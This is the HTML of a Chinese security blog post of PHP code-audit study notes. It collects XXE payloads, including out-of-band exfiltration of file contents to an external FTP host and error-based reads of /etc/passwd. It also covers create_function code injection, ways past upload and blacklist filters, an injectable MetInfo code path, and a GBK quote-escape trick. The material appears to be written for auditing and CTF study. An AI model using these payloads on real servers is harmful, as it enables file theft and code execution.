<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">



  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-minimal.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />





  <link rel="alternate" href="/atom.xml" title="Phyb0x's blog" type="application/atom+xml" />






<meta name="description" content="梧桐百科平台地址：https:&#x2F;&#x2F;tricking.io&#x2F;category&#x2F;php">
<meta property="og:type" content="article">
<meta property="og:title" content="梧桐百科学习">
<meta property="og:url" content="http://yoursite.com/2019/03/07/%E6%A2%A7%E6%A1%90%E7%99%BE%E7%A7%91%E5%AD%A6%E4%B9%A0/index.html">
<meta property="og:site_name" content="Phyb0x&#39;s blog">
<meta property="og:description" content="梧桐百科平台地址：https:&#x2F;&#x2F;tricking.io&#x2F;category&#x2F;php">
<meta property="og:image" content="https://i.imgur.com/KCCnyNr.png">
<meta property="og:image" content="https://i.imgur.com/BhdQkAx.png">
<meta property="og:image" content="https://i.imgur.com/k0krg45.png">
<meta property="og:image" content="https://i.imgur.com/Xp9DBMA.png">
<meta property="og:image" content="https://i.imgur.com/vTcC1Ix.png">
<meta property="og:image" content="https://i.imgur.com/cKU0LF6.png">
<meta property="og:image" content="https://i.imgur.com/QPDcpZR.png">
<meta property="article:published_time" content="2019-03-07T10:19:47.000Z">
<meta property="article:modified_time" content="2020-01-12T01:11:20.000Z">
<meta property="article:author" content="Phyb0x">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.imgur.com/KCCnyNr.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/03/07/梧桐百科学习/"/>





  <title>梧桐百科学习 | Phyb0x's blog</title>
  








<meta name="generator" content="Hexo 4.2.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <a href="https://github.com/phyb0x" target="_blank" rel="noopener"><img style="position: absolute; top: 0; left: 0; border: 0;" src="https://s3.amazonaws.com/github/ribbons/forkme_left_gray_6d6d6d.png" alt="Fork me on GitHub"></a>
    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Phyb0x's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/03/07/%E6%A2%A7%E6%A1%90%E7%99%BE%E7%A7%91%E5%AD%A6%E4%B9%A0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Phyb0x">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="https://b-ssl.duitang.com/uploads/item/201710/05/20171005185843_HmGKQ.jpeg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Phyb0x's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">梧桐百科学习</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-03-07T18:19:47+08:00">
                2019-03-07
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" itemprop="url" rel="index">
                    <span itemprop="name">代码审计</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>梧桐百科平台地址：<a href="https://tricking.io/category/php" target="_blank" rel="noopener">https://tricking.io/category/php</a></p>
<a id="more"></a>

<h3 id="绕过xxe外部实体大小限制"><a href="#绕过xxe外部实体大小限制" class="headerlink" title="绕过xxe外部实体大小限制"></a>绕过xxe外部实体大小限制</h3><pre><code>php://filter/read=zlib.deflate</code></pre><p>fb上给出了通过ftp协议进行绕过的姿势</p>
<pre><code>&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;!DOCTYPE data [
&lt;!ENTITY % remote SYSTEM &quot;http://publicServer.com/parameterEntity_sendftp.dtd&quot;&gt;
%remote;
%send;
]&gt;
&lt;data&gt;4&lt;/data&gt;</code></pre><p>外部dtd内容</p>
<pre><code>&lt;!ENTITY % payload SYSTEM &quot;file:///sys/power/image_size&quot;&gt;
&lt;!ENTITY % param1 &quot;&lt;!ENTITY % send SYSTEM &apos;ftp://publicServer.com/%payload;&apos;&gt;&quot;&gt;
%param1;</code></pre><p><a href="https://www.freebuf.com/articles/web/97833.html" target="_blank" rel="noopener" title="文章提到很多xxe攻击姿势">https://www.freebuf.com/articles/web/97833.html</a></p>
<h3 id="create-function-amp-amp-preg-replace"><a href="#create-function-amp-amp-preg-replace" class="headerlink" title="create_function&amp;&amp;preg_replace"></a>create_function&amp;&amp;preg_replace</h3><pre><code>create_function(&apos;$a, $b&apos;, &apos;}phpinfo();//&apos;);
preg_repalce /e模式的命令执行问题</code></pre><h3 id="PHP利用-绕过文件写入黑名单"><a href="#PHP利用-绕过文件写入黑名单" class="headerlink" title="PHP利用/.绕过文件写入黑名单"></a>PHP利用/.绕过文件写入黑名单</h3><p><img src="https://i.imgur.com/KCCnyNr.png" alt=""></p>
<p>过滤了相关后缀，但是利用/.依旧能写入</p>
<h4 id="绕过删除"><a href="#绕过删除" class="headerlink" title="绕过删除"></a>绕过删除</h4><p> <code>unlink()</code>处理不了 shell.php/. ,但是`file_put_contents可以。 </p>
<pre><code>&lt;?php
$filename = __DIR__ . &apos;/temp/&apos; . $_POST[&apos;filename&apos;];
file_put_contents($filename,$_POST[&apos;data&apos;]);
unlink($filename);</code></pre><p>传入shell.php/.既可被绕过。</p>
<p>linux可用xxxxx/../test.php，win还可用test.php:test test.ph&lt;</p>
<h3 id="报错XXE"><a href="#报错XXE" class="headerlink" title="报错XXE"></a>报错XXE</h3><p>盲xxe中可以将内容通过http参数传递回hacker服务器，但是目标机器与攻击机之间存在防火墙等不定因素网络不连通，这种情况可以用报错xxe</p>
<p><a href="https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/" target="_blank" rel="noopener">https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/</a></p>
<p>看原作者文章的意思是要找到一个内部实体，然后去重新定义</p>
<p>外部DTD允许在第二个DTD包含一个实体，但是内部的DTD是禁止的</p>
<p>原作者payload</p>
<pre><code>&lt;?xml version=&quot;1.0&quot; ?&gt;
&lt;!DOCTYPE message [
&lt;!ENTITY % local_dtd SYSTEM &quot;file:///opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd&quot;&gt;

&lt;!ENTITY % condition &apos;aaa)&gt;
&lt;!ENTITY &amp;#x25; file SYSTEM &quot;file:///etc/passwd&quot;&gt;
&lt;!ENTITY &amp;#x25; eval &quot;&lt;!ENTITY &amp;#x26;#x25; error SYSTEM &amp;#x27;file:///nonexistent/&amp;#x25;file;&amp;#x27;&gt;&quot;&gt;
&amp;#x25;eval;
&amp;#x25;error;
&lt;!ELEMENT aa (bb&apos;&gt;

%local_dtd;
]&gt;
&lt;message&gt;any text&lt;/message&gt;</code></pre><p>可以看到第二个实体中 aa-bbb 为重新定义的DTD,原作者同时给出了几个不同系统下常用的dtd</p>
<p>这里p师傅直接给出了不需要读取本地dtd的方法</p>
<pre><code>&lt;?xml version=&quot;1.0&quot; ?&gt;
&lt;!DOCTYPE message [
&lt;!ENTITY % NUMBER &apos;
&lt;!ENTITY &amp;#x25; file SYSTEM &quot;file:///etc/passwd&quot;&gt;
&lt;!ENTITY &amp;#x25; eval &quot;&lt;!ENTITY &amp;#x26;#x25; error SYSTEM &amp;#x27;file:///nonexistent/&amp;#x25;file;&amp;#x27;&gt;&quot;&gt;
&amp;#x25;eval;
&amp;#x25;error;
&apos;&gt;
%NUMBER;
]&gt;
&lt;message&gt;any text&lt;/message&gt;</code></pre><p>前提    开启报错</p>
<p><img src="https://i.imgur.com/BhdQkAx.png" alt=""></p>
<h3 id="SERVER-‘SCRIPT-NAME’"><a href="#SERVER-‘SCRIPT-NAME’" class="headerlink" title="$_SERVER[‘SCRIPT_NAME’]"></a>$_SERVER[‘SCRIPT_NAME’]</h3><p> <code>$_SERVER[&#39;SCRIPT_NAME&#39;]</code> ，<code>$_SERVER[&#39;PHP_SELF&#39;]</code>都是获取路径的参数。 </p>
<p>看对比 </p>
<p><img src="https://i.imgur.com/k0krg45.png" alt=""></p>
<p><img src="https://i.imgur.com/Xp9DBMA.png" alt=""></p>
<p><img src="https://i.imgur.com/vTcC1Ix.png" alt=""></p>
<p><img src="https://i.imgur.com/cKU0LF6.png" alt=""></p>
<p>但是根据文中方法<code>$_SERVER[&#39;SCRIPT_NAME&#39;]</code>也可以添加自己的内容</p>
<p>在自己添加的目录后面加 空格+/ 添加内容就被获取到</p>
<p><img src="https://i.imgur.com/QPDcpZR.png" alt=""></p>
<p>实例(metinfo注入)</p>
<pre><code>$PHP_SELF = $_SERVER[&apos;PHP_SELF&apos;] ? $_SERVER[&apos;PHP_SELF&apos;] : $_SERVER[&apos;SCRIPT_NAME&apos;];
$PHP_SELFs = explode(&apos;/&apos;, $PHP_SELF);
$query = &quot;SELECT * FROM {$_M[&apos;table&apos;][column]} where module!=0 and foldername = &apos;{$PHP_SELFs[count($PHP_SELFs)-2]}&apos; and lang=&apos;{$_M[&apos;lang&apos;]}&apos;&quot;;
$column = DB::get_one($query);</code></pre><p>可以看到无论用<code>$_SERVER[&#39;SCRIPT_NAME&#39;] ，$_SERVER[&#39;PHP_SELF&#39;]</code>哪一个函数没进行过滤直接传入数据库都会造成注入。</p>
<h3 id="短标签绕过上传-lt-php内容检测"><a href="#短标签绕过上传-lt-php内容检测" class="headerlink" title="短标签绕过上传&lt;?php内容检测"></a>短标签绕过上传&lt;?php内容检测</h3><pre><code>&lt;? phpinfo(); ?&gt;
&lt;?=phpinfo()?&gt; 特别说明安装的时候没有加--disable-short-tags即使php.ini中设置了short_open_tag=false，短标签 &lt;?=..?&gt; 也不受影响
&lt;% phpinfo(); %&gt;
&lt;script language=&quot;php&quot;&gt;phpinfo();&lt;/script&gt;</code></pre><h3 id="PHP-5-6-11-数组比较"><a href="#PHP-5-6-11-数组比较" class="headerlink" title="PHP 5.6.11 数组比较"></a>PHP 5.6.11 数组比较</h3><pre><code>var_dump([0 =&gt; 0] === [0x100000000 =&gt; 0])</code></pre><h3 id="MD5比较"><a href="#MD5比较" class="headerlink" title="MD5比较"></a>MD5比较</h3><p>老生常谈了</p>
<pre><code>var_dump(&quot;0e1234&quot; == &quot;0e5678&quot;);</code></pre><p>目标密码的md5值恰好是“0e”+数字绕过</p>
<h3 id="file-put-contents特性"><a href="#file-put-contents特性" class="headerlink" title="file_put_contents特性"></a>file_put_contents特性</h3><p>这个函数是可以传入数组的</p>
<pre><code>file_put_contents($filename, $array)
file_put_contents($filename, implode(&apos;&apos;, $array))</code></pre><p>利用特性传入数组，绕过preg_match的验证</p>
<pre><code>&lt;?php
$text = $_GET[&apos;text&apos;];
if(preg_match(&apos;[&lt;&gt;?]&apos;, $text)) {
die(&apos;error!&apos;);
}
file_put_contents(&apos;config.php&apos;, $text);</code></pre><h3 id="json-encode单引号逃逸"><a href="#json-encode单引号逃逸" class="headerlink" title="json_encode单引号逃逸"></a>json_encode单引号逃逸</h3><p>在开启GPC下，json_encode编码字符串存入数据库会产生安全问题</p>
<p>json编码(单引号不转义)</p>
<pre><code>&quot; -&gt; \&quot;
\ -&gt; \\</code></pre><p>传入”&#39;“ -&gt; “\‘“ 单引号逃逸</p>
<h3 id="iconv绕过上传白名单"><a href="#iconv绕过上传白名单" class="headerlink" title="iconv绕过上传白名单"></a>iconv绕过上传白名单</h3><p>如果转换编码在检验文件后缀之后可以绕过，感觉本质上是一个逻辑问题</p>
<p>例</p>
<pre><code>&lt;?php
$name = $_FILES[&apos;file&apos;][&apos;name&apos;];
$ext = pathinfo($name, PATHINFO_EXTENSION);
if(in_array($ext, [&apos;.gif&apos;, &apos;.jpg&apos;, &apos;.png&apos;])) {
die(&apos;file extension error&apos;);
}

$name = iconv(&apos;gbk&apos;, &apos;utf-8&apos;, $name);
move_uploaded_file($_FILES[&apos;file&apos;][&apos;tmp_name&apos;], $name);</code></pre><p>先验证后缀，后进行转换则可被绕过1.php\x81.gif，从不合法字符开始阶段</p>
<h4 id="UTF-8-到-GBK"><a href="#UTF-8-到-GBK" class="headerlink" title="UTF-8 到 GBK"></a>UTF-8 到 GBK</h4><p>利用GBK末尾编码\x5c 找到末尾为\x5c的字符\xe5\x5c utf-8 \xe9\x8c\xa6</p>
<p>utf-8 \xe9\x8c\xa6\x27 (addslashes)-&gt;  \xe9\x8c\xa6\x5c\x27 -&gt; GBK \xe5\x5c\x5c\x27 单引号被转义</p>

      
    </div>
    
    
    

    
    <div>
      
        
<div class="my_post_copyright">
  <script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

  <!-- JS库 sweetalert 可修改路径 -->
  <script type="text/javascript" src="http://jslibs.wuxubj.cn/sweetalert_mini/jquery-1.7.1.min.js"></script>
  <script src="http://jslibs.wuxubj.cn/sweetalert_mini/sweetalert.min.js"></script>
  <link rel="stylesheet" type="text/css" href="http://jslibs.wuxubj.cn/sweetalert_mini/sweetalert.mini.css">
  <p><span>文章作者:</span><a href="/" title="访问 Phyb0x 的个人博客">Phyb0x</a></p>
  <p><span>最后更新:</span>2020年01月12日 09:01:20</p>
  <p><span>原始链接:</span><a href="/2019/03/07/%E6%A2%A7%E6%A1%90%E7%99%BE%E7%A7%91%E5%AD%A6%E4%B9%A0/" title="梧桐百科学习">http://yoursite.com/2019/03/07/%E6%A2%A7%E6%A1%90%E7%99%BE%E7%A7%91%E5%AD%A6%E4%B9%A0/</a></p>
  <p><span>版权声明:</span>本博客所有文章除特别声明外，均采用 <i class="fa fa-creative-commons"></i> <a rel="license" href="https://creativecommons.org/licenses/by-nc-sa/3.0/" target="_blank" title="Attribution-NonCommercial-ShareAlike 3.0 Unported (CC BY-NC-SA 3.0)"> BY-NC-SA 3.0 许可协议</a>，转载请注明出处！</p>  
</div>

      
    </div>

    
      <div>
        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
  <div>万一有人点了呢！</div>
  <button id="rewardButton" disable="enable" style="width: 80px;line-height: 38px;text-align: center;font-weight: bold;color: #fff;border-radius: 5px;
margin:0 20px 20px 0;position: relative;overflow: hidden;color: #8c96a0;text-shadow:1px 1px 1px #fff;border:1px solid #dce1e6;box-shadow: 0 1px 2px #fff inset,0 -1px 0 #a8abae inset;background: -webkit-linear-gradient(top,#f2f3f7,#e4e8ec);background: -moz-linear-gradient(top,#f2f3f7,#e4e8ec);background: linear-gradient(top,#f2f3f7,#e4e8ec);" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    打赏
  </button>
  <div id="QR" style="display: none;">
    
      <div id="wechat" style="display: inline-block;width:150px;height:150px">
        <img id="wechat_qr" src="/images/wechat.png" alt="Phyb0x WeChat Pay"/>
        <p>WeChat Pay</p>
      </div>
    
    
    
  </div>
</div>

      </div>
    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/02/27/BS-309%E7%9A%84%E4%B8%80%E6%AC%A1%E9%80%97%E6%AF%94%E6%B5%8B%E8%AF%95/" rel="next" title="BS-309的一次逗比测试">
                <i class="fa fa-chevron-left"></i> BS-309的一次逗比测试
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/03/07/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E2%80%94%E2%80%94%E6%8F%90%E5%8F%96hash/" rel="prev" title="提取hash">
                提取hash <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="https://b-ssl.duitang.com/uploads/item/201710/05/20171005185843_HmGKQ.jpeg"
                alt="Phyb0x" />
            
              <p class="site-author-name" itemprop="name">Phyb0x</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/%20%7C%7C%20archive">
              
                  <span class="site-state-item-count">33</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">categories</span>
                
              </div>
            

            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友情链接
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://cdusec.happyhacking.top" title="CDUSEC" target="_blank">CDUSEC</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://nbsec.xyz/" title="大熊's Blog" target="_blank">大熊's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://a3ura.github.io/" title="a3ura's Blog" target="_blank">a3ura's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://a-running-snail2333.github.io/blog.github.io/" title="a-running-snail's Blog" target="_blank">a-running-snail's Blog</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#绕过xxe外部实体大小限制"><span class="nav-number">1.</span> <span class="nav-text">绕过xxe外部实体大小限制</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#create-function-amp-amp-preg-replace"><span class="nav-number">2.</span> <span class="nav-text">create_function&amp;&amp;preg_replace</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#PHP利用-绕过文件写入黑名单"><span class="nav-number">3.</span> <span class="nav-text">PHP利用&#x2F;.绕过文件写入黑名单</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#绕过删除"><span class="nav-number">3.1.</span> <span class="nav-text">绕过删除</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#报错XXE"><span class="nav-number">4.</span> <span class="nav-text">报错XXE</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SERVER-‘SCRIPT-NAME’"><span class="nav-number">5.</span> <span class="nav-text">$_SERVER[‘SCRIPT_NAME’]</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#短标签绕过上传-lt-php内容检测"><span class="nav-number">6.</span> <span class="nav-text">短标签绕过上传&lt;?php内容检测</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#PHP-5-6-11-数组比较"><span class="nav-number">7.</span> <span class="nav-text">PHP 5.6.11 数组比较</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#MD5比较"><span class="nav-number">8.</span> <span class="nav-text">MD5比较</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#file-put-contents特性"><span class="nav-number">9.</span> <span class="nav-text">file_put_contents特性</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#json-encode单引号逃逸"><span class="nav-number">10.</span> <span class="nav-text">json_encode单引号逃逸</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#iconv绕过上传白名单"><span class="nav-number">11.</span> <span class="nav-text">iconv绕过上传白名单</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#UTF-8-到-GBK"><span class="nav-number">11.1.</span> <span class="nav-text">UTF-8 到 GBK</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Phyb0x</span>

  <div class="powered-by">
  <i class="fa fa-user-md"></i><span id="busuanzi_container_site_pv">
  本站访客数:<span id="busuanzi_value_site_pv"></span>次
  </span>
  </div>

  
</div>

<!-- 
  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>





-->



        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  






  
  







  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/three.min.js"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/canvas_lines.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
